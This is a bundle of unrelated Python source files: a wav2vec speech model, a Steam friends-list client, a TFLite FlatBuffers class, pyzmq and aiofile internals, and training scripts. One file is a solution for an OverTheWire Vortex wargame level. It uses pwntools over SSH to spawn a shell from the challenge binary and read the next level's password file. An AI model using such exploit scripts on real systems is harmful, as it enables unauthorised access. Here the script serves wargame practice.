parser.add_argument('--balanced-classes', action='store_true',
help='if set, loss is scaled to balance for number of negatives')
parser.add_argument('--project-features', choices=['none', 'same', 'new'],
help='if not none, features are projected using the (same or new) aggregator')
parser.add_argument('--non-affine-group-norm', action='store_true',
help='if set, group norm is not affine')
parser.add_argument('--offset', help='if set, introduces an offset from target to predictions. '
'if set to "auto", it is computed automatically from the receptive field')
@classmethod
def build_model(cls, args, task):
"""Build a new model instance."""
# make sure all arguments are present in older models
base_wav2vec_architecture(args)
model = Wav2VecModel(args)
print(model)
return model
def __init__(self, args):
super().__init__()
self.prediction_steps = args.prediction_steps
offset = args.offset
if args.encoder == 'cnn':
feature_enc_layers = eval(args.conv_feature_layers)
self.feature_extractor = ConvFeatureExtractionModel(
conv_layers=feature_enc_layers,
dropout=0.,
log_compression=args.log_compression,
skip_connections=args.skip_connections_feat,
residual_scale=args.residual_scale,
non_affine_group_norm=args.non_affine_group_norm,
)
embed = feature_enc_layers[-1][0]
else:
raise Exception('unknown encoder type ' + args.encoder)
if args.offset == 'auto':
assert args.encoder == 'cnn'
jin = 0
rin = 0
for _, k, stride in feature_enc_layers:
if rin == 0:
rin = k
rin = rin + (k - 1) * jin
if jin == 0:
jin = stride
else:
jin *= stride
offset = math.ceil(rin / jin)
offset = int(offset)
def make_aggregator():
if args.aggregator == 'cnn':
agg_layers = eval(args.conv_aggregator_layers)
agg_dim = agg_layers[-1][0]
feature_aggregator = ConvAggegator(
conv_layers=agg_layers,
embed=embed,
dropout=args.dropout,
skip_connections=args.skip_connections_agg,
residual_scale=args.residual_scale,
non_affine_group_norm=args.non_affine_group_norm,
conv_bias=not args.no_conv_bias,
zero_pad=args.agg_zero_pad,
)
elif args.aggregator == 'gru':
agg_dim = args.gru_dim
feature_aggregator = nn.Sequential(
TransposeLast(),
nn.GRU(
input_size=embed,
hidden_size=agg_dim,
num_layers=1,
dropout=args.dropout,
),
TransposeLast(deconstruct_idx=0),
)
else:
raise Exception('unknown aggregator type ' + args.aggregator)
return feature_aggregator, agg_dim
self.feature_aggregator, agg_dim = make_aggregator()
self.wav2vec_predictions = Wav2VecPredictionsModel(
in_dim=agg_dim,
out_dim=embed,
prediction_steps=args.prediction_steps,
n_negatives=args.num_negatives,
cross_sample_negatives=args.cross_sample_negatives,
sample_distance=args.sample_distance,
dropout=args.dropout,
offset=offset,
balanced_classes=args.balanced_classes,
)
self.dropout_feats = nn.Dropout(p=args.dropout_features)
self.dropout_agg = nn.Dropout(p=args.dropout_agg)
if args.project_features == 'none':
self.project_features = None
elif args.project_features == 'same':
self.project_features = self.feature_aggregator
elif args.project_features == 'new':
self.project_features, _ = make_aggregator()
def forward(self, source):
result = {}
features = self.feature_extractor(source)
x = self.dropout_feats(features)
x = self.feature_aggregator(x)
x = self.dropout_agg(x)
if self.project_features is not None:
features = self.project_features(features)
x, targets = self.wav2vec_predictions(x, features)
result['cpc_logits'] = x
result['cpc_targets'] = targets
return result
def upgrade_state_dict_named(self, state_dict, name):
return state_dict
def max_positions(self):
"""Maximum length supported by the model."""
return sys.maxsize
def get_logits(self, net_output):
logits = net_output['cpc_logits']
return logits
def get_targets(self, sample, net_output, expand_steps=True):
t = net_output['cpc_targets']
return t.contiguous()
def get_target_weights(self, targets, net_output):
targets = net_output['cpc_targets']
if isinstance(targets, tuple) and targets[-1] is not None:
return targets[-1]
return 1.
class TransposeLast(nn.Module):
def __init__(self, deconstruct_idx=None):
super().__init__()
self.deconstruct_idx = deconstruct_idx
def forward(self, x):
if self.deconstruct_idx is not None:
x = x[self.deconstruct_idx]
return x.transpose(-2, -1)
class Fp32GroupNorm(nn.GroupNorm):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def forward(self, input):
output = F.group_norm(
input.float(), self.num_groups, self.weight.float() if self.weight is not None else None,
self.bias.float() if self.bias is not None else None, self.eps)
return output.type_as(input)
class Fp32LayerNorm(nn.LayerNorm):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def forward(self, input):
output = F.layer_norm(
input.float(), self.normalized_shape, self.weight.float() if self.weight is not None else None,
self.bias.float() if self.bias is not None else None, self.eps)
return output.type_as(input)
def norm_block(is_layer_norm, dim, affine=True):
if is_layer_norm:
mod = nn.Sequential(
TransposeLast(),
Fp32LayerNorm(dim, elementwise_affine=affine),
TransposeLast(),
)
else:
mod = Fp32GroupNorm(1, dim, affine=affine)
return mod
class ConvFeatureExtractionModel(nn.Module):
def __init__(self, conv_layers, dropout, log_compression, skip_connections, residual_scale, non_affine_group_norm):
super().__init__()
def block(n_in, n_out, k, stride):
return nn.Sequential(
nn.Conv1d(n_in, n_out, k, stride=stride, bias=False),
nn.Dropout(p=dropout),
norm_block(is_layer_norm=False, dim=n_out, affine=not non_affine_group_norm),
nn.ReLU(),
)
in_d = 1
self.conv_layers = nn.ModuleList()
for i, (dim, k, stride) in enumerate(conv_layers):
self.conv_layers.append(
block(in_d, dim, k, stride))
in_d = dim
self.log_compression = log_compression
self.skip_connections = skip_connections
self.residual_scale = math.sqrt(residual_scale)
def forward(self, x):
# BxT -> BxCxT
x = x.unsqueeze(1)
for conv in self.conv_layers:
residual = x
x = conv(x)
if self.skip_connections and x.size(1) == residual.size(1):
tsz = x.size(2)
r_tsz = residual.size(2)
residual = residual[..., ::r_tsz // tsz][..., :tsz]
x = (x + residual) * self.residual_scale
if self.log_compression:
x = x.abs()
x = x + 1
x = x.log()
return x
class ZeroPad1d(nn.Module):
def __init__(self, pad_left, pad_right):
super().__init__()
self.pad_left = pad_left
self.pad_right = pad_right
def forward(self, x):
return F.pad(x, (self.pad_left, self.pad_right))
class ConvAggegator(nn.Module):
def __init__(self, conv_layers, embed, dropout, skip_connections, residual_scale, non_affine_group_norm, conv_bias,
zero_pad):
super().__init__()
def block(n_in, n_out, k, stride):
# padding dims only really make sense for stride = 1
ka = k // 2
kb = ka - 1 if k % 2 == 0 else ka
pad = ZeroPad1d(ka + kb, 0) if zero_pad else nn.ReplicationPad1d((ka + kb, 0))
return nn.Sequential(
pad,
nn.Conv1d(n_in, n_out, k, stride=stride, bias=conv_bias),
nn.Dropout(p=dropout),
norm_block(False, n_out, affine=not non_affine_group_norm),
nn.ReLU(),
)
in_d = embed
self.conv_layers = nn.ModuleList()
self.residual_proj = nn.ModuleList()
for i, (dim, k, stride) in enumerate(conv_layers):
if in_d != dim and skip_connections:
self.residual_proj.append(
nn.Conv1d(in_d, dim, 1, bias=False),
)
else:
self.residual_proj.append(None)
self.conv_layers.append(
block(in_d, dim, k, stride))
in_d = dim
self.conv_layers = nn.Sequential(*self.conv_layers)
self.skip_connections = skip_connections
self.residual_scale = math.sqrt(residual_scale)
def forward(self, x):
for rproj, conv in zip(self.residual_proj, self.conv_layers):
residual = x
x = conv(x)
if self.skip_connections:
if rproj is not None:
residual = rproj(residual)
x = (x + residual) * self.residual_scale
return x
class Wav2VecPredictionsModel(nn.Module):
def __init__(self, in_dim, out_dim, prediction_steps, n_negatives, cross_sample_negatives, sample_distance,
dropout, offset, balanced_classes):
super().__init__()
self.n_negatives = n_negatives
self.cross_sample_negatives = cross_sample_negatives
self.sample_distance = sample_distance
self.project_to_steps = nn.ConvTranspose2d(in_dim, out_dim, (1, prediction_steps))
self.dropout = nn.Dropout(p=dropout)
self.offset = offset
self.balanced_classes = balanced_classes
def sample_negatives(self, y):
bsz, fsz, tsz = y.shape
y = y.transpose(0, 1) # BCT -> CBT
y = y.contiguous().view(fsz, -1) # CBT => C(BxT)
if self.cross_sample_negatives:
high = tsz * bsz
assert self.sample_distance is None, 'sample distance is not supported with cross sampling'
else:
high = tsz if self.sample_distance is None else min(tsz, self.sample_distance)
neg_idxs = torch.randint(low=0, high=high, size=(bsz, self.n_negatives * tsz))
if self.sample_distance is not None and self.sample_distance < tsz:
neg_idxs += torch.cat(
[torch.arange(start=1, end=tsz - self.sample_distance, device=neg_idxs.device, dtype=neg_idxs.dtype),
torch.arange(start=tsz - self.sample_distance, end=tsz - self.sample_distance * 2 - 1, step=-1,
device=neg_idxs.device, dtype=neg_idxs.dtype)])
if not self.cross_sample_negatives:
for i in range(1, bsz):
neg_idxs[i] += i * high
negs = y[..., neg_idxs.view(-1)]
negs = negs.view(fsz, bsz, self.n_negatives, tsz).permute(2, 1, 0, 3) # to NxBxCxT
return negs
def forward(self, x, y):
negatives = self.sample_negatives(y)
y = y.unsqueeze(0)
targets = torch.cat([y, negatives], dim=0)
x = x.unsqueeze(-1)
x = self.project_to_steps(x) # BxCxTxS
x = self.dropout(x)
x = x.unsqueeze(0).expand(targets.size(0), -1, -1, -1, -1)
copies, bsz, dim, tsz, steps = x.shape
steps = min(steps, tsz - self.offset)
predictions = x.new(bsz * copies * (tsz - self.offset + 1) * steps - ((steps + 1) * steps // 2) * copies * bsz)
labels = torch.zeros_like(predictions)
weights = torch.full_like(labels, 1 / self.n_negatives) if self.balanced_classes else None
start = end = 0
for i in range(steps):
offset = i + self.offset
end = start + (tsz - offset) * bsz * copies
pos_num = (end - start) // copies
predictions[start:end] = (x[..., :-offset, i] * targets[..., offset:]).sum(dim=2).flatten()
labels[start:start + pos_num] = 1.
if weights is not None:
weights[start:start + pos_num] = 1.
start = end
assert end == predictions.numel(), '{} != {}'.format(end, predictions.numel())
if weights is not None:
labels = (labels, weights)
return predictions, labels
@register_model_architecture('wav2vec', 'wav2vec')
def base_wav2vec_architecture(args):
conv_feature_layers = '[(512, 10, 5)]'
conv_feature_layers += ' + [(512, 8, 4)]'
conv_feature_layers += ' + [(512, 4, 2)] * 3'
args.conv_feature_layers = getattr(args, 'conv_feature_layers', conv_feature_layers)
args.conv_aggregator_layers = getattr(args, 'conv_aggregator_layers', '[(512, 3, 1)] * 9')
args.prediction_steps = getattr(args, 'prediction_steps', 12)
args.num_negatives = getattr(args, 'num_negatives', 1)
args.sample_distance = getattr(args, 'sample_distance', None)
args.cross_sample_negatives = getattr(args, 'cross_sample_negatives', False)
args.dropout = getattr(args, 'dropout', 0.)
args.dropout_features = getattr(args, 'dropout_features', 0.)
args.dropout_agg = getattr(args, 'dropout_agg', 0.)
args.encoder = getattr(args, 'encoder', 'cnn')
args.aggregator = getattr(args, 'aggregator', 'cnn')
args.skip_connections_feat = getattr(args, 'skip_connections_feat', False)
args.skip_connections_agg = getattr(args, 'skip_connections_agg', False)
args.residual_scale = getattr(args, 'residual_scale', 0.5)
args.gru_dim = getattr(args, 'gru_dim', 512)
args.no_conv_bias = getattr(args, 'no_conv_bias', False)
args.agg_zero_pad = getattr(args, 'agg_zero_pad', False)
args.log_compression = getattr(args, 'log_compression', False)
args.balanced_classes = getattr(args, 'balanced_classes', False)
args.project_features = getattr(args, 'project_features', 'none')
args.non_affine_group_norm = getattr(args, 'non_affine_group_norm', False)
args.offset = getattr(args, 'offset', 'auto')
|
steam/client/builtins/friends.py | tjensen/steam | 727 | 11086502 | <reponame>tjensen/steam<gh_stars>100-1000
import logging
from six import itervalues
from eventemitter import EventEmitter
from steam.steamid import SteamID, intBase
from steam.enums import EResult, EFriendRelationship
from steam.enums.emsg import EMsg
from steam.core.msg import MsgProto
from steam.client.user import SteamUser
class Friends(object):
def __init__(self, *args, **kwargs):
super(Friends, self).__init__(*args, **kwargs)
#: :class:`.SteamFriendlist` instance
self.friends = SteamFriendlist(self, logger_name="%s.friends" % self.__class__.__name__)
class SteamFriendlist(EventEmitter):
"""SteamFriendlist is an object that keeps state of user's friend list.
It's essentially a :class:`list` of :class:`.SteamUser`.
You can iterate over it, check if it contains a particular ``steam id``,
or get :class:`.SteamUser` for a ``steam id``.
"""
EVENT_READY = 'ready'
"""Friend list is ready for use
"""
EVENT_FRIEND_INVITE = 'friend_invite'
"""New or existing friend invite
:param user: steam user instance
:type user: :class:`.SteamUser`
"""
EVENT_FRIEND_NEW = 'friend_new'
"""Friendship established (after being accepted, or accepting)
:param user: steam user instance
:type user: :class:`.SteamUser`
"""
EVENT_FRIEND_REMOVED = 'friend_removed'
"""No longer a friend (removed by either side)
:param user: steam user instance
:type user: :class:`.SteamUser`
"""
EVENT_FRIEND_ADD_RESULT = 'friend_add_result'
"""Result response after adding a friend
:param eresult: result
:type eresult: :class:`.EResult`
:param steam_id: steam id
:type steam_id: :class:`.SteamID`
"""
ready = False #: indicates whether friend list is ready for use
def __init__(self, client, logger_name='SteamFriendList'):
self._LOG = logging.getLogger(logger_name)
self._fr = {}
self._steam = client
self._steam.on(EMsg.ClientAddFriendResponse, self._handle_add_friend_result)
self._steam.on(EMsg.ClientFriendsList, self._handle_friends_list)
self._steam.on(self._steam.EVENT_DISCONNECTED, self._handle_disconnect)
def emit(self, event, *args):
if event is not None:
self._LOG.debug("Emit event: %s" % repr(event))
EventEmitter.emit(self, event, *args)
def _handle_disconnect(self):
self.ready = False
self._fr.clear()
def _handle_add_friend_result(self, message):
eresult = EResult(message.body.eresult)
steam_id = SteamID(message.body.steam_id_added)
self.emit(self.EVENT_FRIEND_ADD_RESULT, eresult, steam_id)
def _handle_friends_list(self, message):
incremental = message.body.bincremental
if incremental == False:
self._fr.clear()
steamids_to_check = set()
# update internal friends list
for friend in message.body.friends:
steamid = SteamID(friend.ulfriendid)
if steamid.type != steamid.EType.Individual:
continue
suser = self._steam.get_user(steamid, False)
rel = EFriendRelationship(friend.efriendrelationship)
if steamid not in self._fr and rel != EFriendRelationship.NONE: # 0
self._fr[steamid] = suser
suser.relationship = rel
steamids_to_check.add(steamid)
if rel in (2,4): # RequestRecipient = 2, RequestInitiator = 4
if rel == EFriendRelationship.RequestRecipient:
self.emit(self.EVENT_FRIEND_INVITE, suser)
else:
oldrel, suser.relationship = suser.relationship, rel
if rel == EFriendRelationship.NONE:
suser = self._fr.pop(steamid, None)
if suser and oldrel not in (EFriendRelationship.Ignored, 0):
self.emit(self.EVENT_FRIEND_REMOVED, suser)
elif oldrel in (2,4) and rel == EFriendRelationship.Friend:
self.emit(self.EVENT_FRIEND_NEW, suser)
# request persona state for any new entries
if steamids_to_check:
self._steam.request_persona_state(steamids_to_check)
if not self.ready:
self.ready = True
self.emit(self.EVENT_READY)
def __repr__(self):
return "<%s %d users>" % (
self.__class__.__name__,
len(self._fr),
)
def __len__(self):
return len(self._fr)
def __iter__(self):
return itervalues(self._fr)
def __list__(self):
return list(iter(self))
def __getitem__(self, key):
if isinstance(key, SteamUser):
key = key.steam_id
return self._fr[key]
def __contains__(self, friend):
if isinstance(friend, SteamUser):
friend = friend.steam_id
return friend in self._fr
def add(self, steamid_or_accountname_or_email):
"""
Add/Accept a steam user to be your friend.
When someone sends you an invite, use this method to accept it.
:param steamid_or_accountname_or_email: steamid, account name, or email
:type steamid_or_accountname_or_email: :class:`int`, :class:`.SteamID`, :class:`.SteamUser`, :class:`str`
.. note::
Adding by email doesn't not work. It's only mentioned for the sake of completeness.
"""
m = MsgProto(EMsg.ClientAddFriend)
if isinstance(steamid_or_accountname_or_email, (intBase, int)):
m.body.steamid_to_add = steamid_or_accountname_or_email
elif isinstance(steamid_or_accountname_or_email, SteamUser):
m.body.steamid_to_add = steamid_or_accountname_or_email.steam_id
else:
m.body.accountname_or_email_to_add = steamid_or_accountname_or_email
self._steam.send_job(m)
def remove(self, steamid):
"""
Remove a friend
:param steamid: their steamid
:type steamid: :class:`int`, :class:`.SteamID`, :class:`.SteamUser`
"""
if isinstance(steamid, SteamUser):
steamid = steamid.steam_id
self._steam.send(MsgProto(EMsg.ClientRemoveFriend), {'friendid': steamid})
def block(self, steamid):
"""
Block Steam user
:param steamid: their steamid
:type steamid: :class:`int`, :class:`.SteamID`, :class:`.SteamUser`
:return: result
:rtype: :class:`EResult`
"""
if isinstance(steamid, SteamUser):
steamid = steamid.steam_id
elif not isinstance(steamid, SteamID):
steamid = SteamID(steamid)
resp = self._steam.send_um_and_wait("Player.IgnoreFriend#1",
{"steamid": steamid},
timeout=10)
if not resp:
return EResult.Timeout
elif resp.header.eresult == EResult.OK:
if steamid not in self._fr:
self._fr[steamid] = self._steam.get_user(steamid, False)
self._fr[steamid].relationship = EFriendRelationship(resp.body.friend_relationship)
return resp.header.eresult
def unblock(self, steamid):
"""
Unblock Steam user
:param steamid: their steamid
:type steamid: :class:`int`, :class:`.SteamID`, :class:`.SteamUser`
:return: result
:rtype: :class:`EResult`
"""
if isinstance(steamid, SteamUser):
steamid = steamid.steam_id
elif not isinstance(steamid, SteamID):
steamid = SteamID(steamid)
resp = self._steam.send_um_and_wait("Player.IgnoreFriend#1",
{"steamid": steamid, "unignore": True},
timeout=10)
if not resp:
return EResult.Timeout
elif resp.header.eresult == EResult.OK:
if steamid in self._fr:
self._fr[steamid].relationship = EFriendRelationship(resp.body.friend_relationship)
return resp.header.eresult
|
src/smart_compose/run_smart_compose.py | StarWang/detext | 1,229 | 11086512 | <gh_stars>1000+
import sys
import tempfile
from dataclasses import asdict
import tensorflow as tf
from absl import logging
from official.utils.misc import distribution_utils
from smart_compose.args import SmartComposeArg
from smart_compose.train import train
from smart_compose.utils import distributed_utils, parsing_utils
def main(argv):
""" This is the main method for training the model.
:param argv: training parameters
"""
argument = SmartComposeArg.__from_argv__(argv[1:], error_on_unknown=False)
logging.set_verbosity(logging.INFO)
logging.info(f"Args:\n {argument}")
hparams = argument
strategy = distribution_utils.get_distribution_strategy(hparams.distribution_strategy, num_gpus=hparams.num_gpu, all_reduce_alg=hparams.all_reduce_alg)
logging.info(f"***********Num replica: {strategy.num_replicas_in_sync}***********")
create_output_dir(hparams.resume_training, hparams.out_dir, strategy)
save_hparams(hparams.out_dir, parsing_utils.HParams(**asdict(argument)), strategy)
logging.info("***********Smart Compose Training***********")
return train.train(strategy, hparams)
def save_hparams(out_dir, hparams, strategy):
"""Saves hparams to out_dir"""
is_chief = distributed_utils.is_chief(strategy)
if not is_chief:
out_dir = tempfile.mkdtemp()
parsing_utils.save_hparams(out_dir, hparams)
if not is_chief:
tf.io.gfile.remove(parsing_utils._get_hparam_path(out_dir))
def create_output_dir(resume_training, out_dir, strategy):
"""Creates output directory if not exists"""
is_chief = distributed_utils.is_chief(strategy)
if not is_chief:
out_dir = tempfile.mkdtemp()
if not resume_training:
if tf.io.gfile.exists(out_dir):
logging.info("Removing previous output directory...")
tf.io.gfile.rmtree(out_dir)
# If output directory deleted or does not exist, create the directory.
if not tf.io.gfile.exists(out_dir):
logging.info('Creating dirs recursively at: {0}'.format(out_dir))
tf.io.gfile.makedirs(out_dir)
if not is_chief:
tf.io.gfile.rmtree(out_dir)
if __name__ == '__main__':
main(sys.argv)
|
wargames/overthewire-vortex/level6/win.py | spchal/pwntools-write-ups | 456 | 11086514 | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
from pwn import *
level = 6
host = 'vortex.labs.overthewire.org'
user = 'vortex%i' % level
chal = 'vortex%i' % level
password = args['PASSWORD']
passfile = '/etc/vortex_pass/<PASSWORD>' % (level+1)
binary = '/vortex/%s' % chal
shell = ssh(host=host, user=user, password=password)
if not os.path.exists(chal):
shell.download_file(binary)
os.chmod(chal, 0755)
sh = shell.run('''
python -c "
import sys, os
os.execve(%r, ['/bin/sh'], {'a':'b'})
"
''' % binary)
sh.clean(2)
sh.sendline('id')
log.success('id: ' + sh.recvline().strip())
sh.sendline('cat %s' % passfile)
password = sh.recvline().strip()
log.success('Password: %s' % password)
print password
|
service/generated_flatbuffers/tflite/LSTMOptions.py | lcrh/falken | 213 | 11086521 | <gh_stars>100-1000
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# automatically generated by the FlatBuffers compiler, do not modify
# namespace: tflite
import flatbuffers
from flatbuffers.compat import import_numpy
np = import_numpy()
class LSTMOptions(object):
__slots__ = ['_tab']
@classmethod
def GetRootAsLSTMOptions(cls, buf, offset):
n = flatbuffers.encode.Get(flatbuffers.packer.uoffset, buf, offset)
x = LSTMOptions()
x.Init(buf, n + offset)
return x
@classmethod
def LSTMOptionsBufferHasIdentifier(cls, buf, offset, size_prefixed=False):
return flatbuffers.util.BufferHasIdentifier(buf, offset, b"\x54\x46\x4C\x33", size_prefixed=size_prefixed)
# LSTMOptions
def Init(self, buf, pos):
self._tab = flatbuffers.table.Table(buf, pos)
# LSTMOptions
def FusedActivationFunction(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(4))
if o != 0:
return self._tab.Get(flatbuffers.number_types.Int8Flags, o + self._tab.Pos)
return 0
# LSTMOptions
def CellClip(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(6))
if o != 0:
return self._tab.Get(flatbuffers.number_types.Float32Flags, o + self._tab.Pos)
return 0.0
# LSTMOptions
def ProjClip(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(8))
if o != 0:
return self._tab.Get(flatbuffers.number_types.Float32Flags, o + self._tab.Pos)
return 0.0
# LSTMOptions
def KernelType(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(10))
if o != 0:
return self._tab.Get(flatbuffers.number_types.Int8Flags, o + self._tab.Pos)
return 0
# LSTMOptions
def AsymmetricQuantizeInputs(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(12))
if o != 0:
return bool(self._tab.Get(flatbuffers.number_types.BoolFlags, o + self._tab.Pos))
return False
def LSTMOptionsStart(builder): builder.StartObject(5)
def LSTMOptionsAddFusedActivationFunction(builder, fusedActivationFunction): builder.PrependInt8Slot(0, fusedActivationFunction, 0)
def LSTMOptionsAddCellClip(builder, cellClip): builder.PrependFloat32Slot(1, cellClip, 0.0)
def LSTMOptionsAddProjClip(builder, projClip): builder.PrependFloat32Slot(2, projClip, 0.0)
def LSTMOptionsAddKernelType(builder, kernelType): builder.PrependInt8Slot(3, kernelType, 0)
def LSTMOptionsAddAsymmetricQuantizeInputs(builder, asymmetricQuantizeInputs): builder.PrependBoolSlot(4, asymmetricQuantizeInputs, 0)
def LSTMOptionsEnd(builder): return builder.EndObject()
class LSTMOptionsT(object):
# LSTMOptionsT
def __init__(self):
self.fusedActivationFunction = 0 # type: int
self.cellClip = 0.0 # type: float
self.projClip = 0.0 # type: float
self.kernelType = 0 # type: int
self.asymmetricQuantizeInputs = False # type: bool
@classmethod
def InitFromBuf(cls, buf, pos):
lSTMOptions = LSTMOptions()
lSTMOptions.Init(buf, pos)
return cls.InitFromObj(lSTMOptions)
@classmethod
def InitFromObj(cls, lSTMOptions):
x = LSTMOptionsT()
x._UnPack(lSTMOptions)
return x
# LSTMOptionsT
def _UnPack(self, lSTMOptions):
if lSTMOptions is None:
return
self.fusedActivationFunction = lSTMOptions.FusedActivationFunction()
self.cellClip = lSTMOptions.CellClip()
self.projClip = lSTMOptions.ProjClip()
self.kernelType = lSTMOptions.KernelType()
self.asymmetricQuantizeInputs = lSTMOptions.AsymmetricQuantizeInputs()
# LSTMOptionsT
def Pack(self, builder):
LSTMOptionsStart(builder)
LSTMOptionsAddFusedActivationFunction(builder, self.fusedActivationFunction)
LSTMOptionsAddCellClip(builder, self.cellClip)
LSTMOptionsAddProjClip(builder, self.projClip)
LSTMOptionsAddKernelType(builder, self.kernelType)
LSTMOptionsAddAsymmetricQuantizeInputs(builder, self.asymmetricQuantizeInputs)
lSTMOptions = LSTMOptionsEnd(builder)
return lSTMOptions
|
tests/conftest.py | cclauss/aiofile | 311 | 11086554 | <filename>tests/conftest.py
from functools import partial
import pytest
from caio import python_aio_asyncio
from aiofile import AIOFile, async_open
try:
from caio import thread_aio_asyncio
except ImportError:
thread_aio_asyncio = None
try:
from caio import linux_aio_asyncio
except ImportError:
linux_aio_asyncio = None
class DefaultContext:
__name__ = "default"
IMPLEMENTATIONS = list(
filter(
None, [
linux_aio_asyncio,
thread_aio_asyncio,
python_aio_asyncio,
DefaultContext(),
],
),
)
IMPLEMENTATION_NAMES = map(lambda x: x.__name__, IMPLEMENTATIONS)
@pytest.fixture(params=IMPLEMENTATIONS, ids=IMPLEMENTATION_NAMES)
async def aio_context(request, loop):
if isinstance(request.param, DefaultContext):
yield None
return
async with request.param.AsyncioContext(loop=loop) as context:
yield context
@pytest.fixture
def aio_file_maker(aio_context):
return partial(AIOFile, context=aio_context)
@pytest.fixture(name="async_open")
def async_open_maker(aio_context):
return partial(async_open, context=aio_context)
|
src/lib/utils/stress_test/.s/python/lib/python3.6/site-packages/zmq/backend/cffi/message.py | devsapp/fc-stress-desktop | 603 | 11086556 | <gh_stars>100-1000
"""Dummy Frame object"""
# Copyright (C) PyZMQ Developers
# Distributed under the terms of the Modified BSD License.
import errno
from threading import Event
from ._cffi import ffi, lib as C
from .constants import ETERM
import zmq
from zmq.utils.strtypes import unicode
import zmq.error
zmq_gc = None
try:
from __pypy__.bufferable import bufferable as maybe_bufferable
except ImportError:
maybe_bufferable = object
def _content(obj):
"""Return content of obj as bytes"""
if type(obj) is bytes:
return obj
if not isinstance(obj, memoryview):
obj = memoryview(obj)
return obj.tobytes()
def _check_rc(rc):
err = C.zmq_errno()
if rc == -1:
if err == errno.EINTR:
raise zmq.error.InterrruptedSystemCall(err)
elif err == errno.EAGAIN:
raise zmq.error.Again(errno)
elif err == ETERM:
raise zmq.error.ContextTerminated(err)
else:
raise zmq.error.ZMQError(err)
return 0
class Frame(maybe_bufferable):
_data = None
tracker = None
closed = False
more = False
_buffer = None
_bytes = None
_failed_init = False
tracker_event = None
zmq_msg = None
def __init__(self, data=None, track=False, copy=None, copy_threshold=None):
self._failed_init = True
self.zmq_msg = ffi.cast('zmq_msg_t[1]', C.malloc(ffi.sizeof("zmq_msg_t")))
# self.tracker should start finished
# except in the case where we are sharing memory with libzmq
if track:
self.tracker = zmq._FINISHED_TRACKER
if isinstance(data, unicode):
raise TypeError(
"Unicode objects not allowed. Only: bytes, buffer interfaces."
)
if data is None:
rc = C.zmq_msg_init(self.zmq_msg)
_check_rc(rc)
self._failed_init = False
return
self._data = data
if type(data) is bytes:
# avoid unnecessary copy on .bytes access
self._bytes = data
self._buffer = memoryview(data)
c_data = ffi.from_buffer(self._buffer)
data_len_c = self._buffer.nbytes
if copy is None:
if copy_threshold and data_len_c < copy_threshold:
copy = True
else:
copy = False
if copy:
# copy message data instead of sharing memory
rc = C.zmq_msg_init_size(self.zmq_msg, data_len_c)
_check_rc(rc)
ffi.buffer(C.zmq_msg_data(self.zmq_msg), data_len_c)[:] = self._buffer
self._failed_init = False
return
# Getting here means that we are doing a true zero-copy Frame,
# where libzmq and Python are sharing memory.
# Hook up garbage collection with MessageTracker and zmq_free_fn
# Event and MessageTracker for monitoring when zmq is done with data:
if track:
evt = Event()
self.tracker_event = evt
self.tracker = zmq.MessageTracker(evt)
# create the hint for zmq_free_fn
# two pointers: the zmq_gc context and a message to be sent to the zmq_gc PULL socket
# allows libzmq to signal to Python when it is done with Python-owned memory.
global zmq_gc
if zmq_gc is None:
from zmq.utils.garbage import gc as zmq_gc
# can't use ffi.new because it will be freed at the wrong time!
hint = ffi.cast("zhint[1]", C.malloc(ffi.sizeof("zhint")))
hint[0].id = zmq_gc.store(data, self.tracker_event)
if not zmq_gc._push_mutex:
zmq_gc._push_mutex = C.mutex_allocate()
hint[0].mutex = ffi.cast("mutex_t*", zmq_gc._push_mutex)
hint[0].sock = ffi.cast("void*", zmq_gc._push_socket.underlying)
# calls zmq_wrap_msg_init_data with the C.free_python_msg callback
rc = C.zmq_wrap_msg_init_data(
self.zmq_msg,
c_data,
data_len_c,
hint,
)
if rc != 0:
C.free(hint)
C.free(self.zmq_msg)
_check_rc(rc)
self._failed_init = False
def __del__(self):
if not self.closed and not self._failed_init:
self.close()
def close(self):
if self.closed or self._failed_init or self.zmq_msg is None:
return
self.closed = True
rc = C.zmq_msg_close(self.zmq_msg)
C.free(self.zmq_msg)
self.zmq_msg = None
if rc != 0:
_check_rc(rc)
def _buffer_from_zmq_msg(self):
"""one-time extract buffer from zmq_msg
for Frames created by recv
"""
if self._data is None:
self._data = ffi.buffer(
C.zmq_msg_data(self.zmq_msg), C.zmq_msg_size(self.zmq_msg)
)
if self._buffer is None:
self._buffer = memoryview(self._data)
@property
def buffer(self):
if self._buffer is None:
self._buffer_from_zmq_msg()
return self._buffer
@property
def bytes(self):
if self._bytes is None:
self._bytes = self.buffer.tobytes()
return self._bytes
def __len__(self):
return self.buffer.nbytes
def __eq__(self, other):
return self.bytes == _content(other)
def __str__(self):
return self.bytes.decode()
@property
def done(self):
return self.tracker.done()
def __buffer__(self, flags):
return self._buffer
def __copy__(self):
"""Create a shallow copy of the message.
This does not copy the contents of the Frame, just the pointer.
This will increment the 0MQ ref count of the message, but not
the ref count of the Python object. That is only done once when
the Python is first turned into a 0MQ message.
"""
return self.fast_copy()
def fast_copy(self):
"""Fast shallow copy of the Frame.
Does not copy underlying data.
"""
new_msg = Frame()
# This does not copy the contents, but just increases the ref-count
# of the zmq_msg by one.
C.zmq_msg_copy(new_msg.zmq_msg, self.zmq_msg)
# Copy the ref to underlying data
new_msg._data = self._data
new_msg._buffer = self._buffer
# Frame copies share the tracker and tracker_event
new_msg.tracker_event = self.tracker_event
new_msg.tracker = self.tracker
return new_msg
Message = Frame
__all__ = ['Frame', 'Message']
|
nbs/live_streams/Exploring the fastai Callback System/utils.py | sakibsadmanshajib/walkwithfastai.github.io | 104 | 11086604 | # This source code is directly from goralpl's Seq2Seq example, which we worked on debugging together https://github.com/goralpl/learning_fastai/blob/master/seq2seq_fastai_datablocks_custom_model.ipynb
from fastai.text.all import *
